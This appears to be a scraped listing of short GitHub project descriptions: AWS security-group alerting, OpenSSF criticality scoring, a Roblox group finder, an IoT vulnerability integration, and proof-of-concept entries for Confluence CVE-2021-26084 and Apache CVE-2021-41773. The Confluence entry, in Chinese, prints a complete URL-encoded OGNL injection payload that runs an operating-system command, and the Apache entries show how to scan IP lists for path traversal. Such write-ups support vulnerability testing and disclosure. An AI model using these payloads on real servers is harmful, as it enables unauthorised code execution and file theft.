Introduction Get notified of Security Group Changes across all AWS Accounts & Regions in an AWS Organization, with the ability to respond/revert those changes with a single button click from a Slack Channel.This is made easy and possible with the recent announcement of CloudTrail Lake, which helps aggregate CloudTrail logs from all accounts/regions in a queryable(if that’s a word :P) format. The infrastructure needed for this project is deployed as a CDK Application, which deploys a CodeCommit repository and a […]

This project is maintained by members of theSecuring Critical Projects WG. Goals Generate a criticality score for every open source project. Create a list of critical projects that the open source community depends on. Use this data to proactively improve the security posture of these critical projects. Criticality Score A project’s criticality score defines the influence and importance of a project.It is a number between0 (least-critical) and 1 (most-critical). It is based on the followingalgorithmby Rob Pike: We use the […]

an opensourced roblox group finder writen in python 100% free and virus-free note : if you don’t want install python or just use with ez the group finder you have just to install the compiled (.exe) vertion thats not require python ! please keep credits and don’t try to sell it. my roblox profil : https://www.roblox.com/users/373723880/profile ——— install ——— INSTALL SOURCE CODE (.py) ——— credits ——— compiled using pyinstaller GitHub View Github    

CVE-2021-26084，Atlassian Confluence OGNL注入漏洞 Atlassian Confluence 是企业广泛使用的维基系统，其部分版本中存在OGNL 表达式注入漏洞。攻击者可以通过漏洞，不需要任何用户的情况下在目标Confluence 中执行任意代码。 queryString参数执行任意命令 queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027 /pages/createpage.action这个接口需要一个可以创建页面的用户权限： /pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 http://your-ip:8090/pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027 /pages/createpage-entervariables.action /pages/doenterpagevariables.action 不需要登录，用POST请求 脚本测试： 命令: 脚本利用: 命令: python3 -u http://example.com 参考： https://github.com/vulhub/vulhub/blob/master/confluence/ https://github.com/h3v0x/CVE-2021-26084_Confluence https://www.cnblogs.com/huangxiaosan/p/14290034.html https://blog.csdn.net/weixin_43072923/article/details/117083611 GitHub View Github    

Poc para testear la vulnerabilidad CVE-2021-41773 correspondiente al servicio apache httpd 2.4.49. POC Open your favorite Terminal and run these commands. First Tab: wget https://raw.githubusercontent.com/TishcaTpx/POC-CVE-2021-41773/main/poc.py Second Tab: python3 poc.py exampledomain.com GitHub https://github.com/TishcaTpx/POC-CVE-2021-41773    

Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 This script test Apache HTTP Server 2.4.49 Usage: CVE-2021-41773.py options Only for one IP: python CVE-2021-41773.py IP_address Option -f For IP list in fileExample: python CVE-2021-41773.py -f IP_address_list_filename Output python CVE-2021-41773.py AAA.BBB.CCC.DDD Server AAA.BBB.CCC.DDD IS VULNERABLE The    

This repository hosts a sample application that demonstrates integrating Firmalyzer’s IoTVAS API with the Rapid7 InsightVM platform. This integration enables InsightVM users to: accurately identify IoT/connected devices and their vulnerabilities in the firmware code level track and manage discontinued, outdated and vulnerable devices from within InsightVM platform Clone the repository content to a local folder and issue the following commands: python3 -mvenv env source env/bin/activate pip install -r requirements.txt Note: This application is based on the InsightVM API client (located […]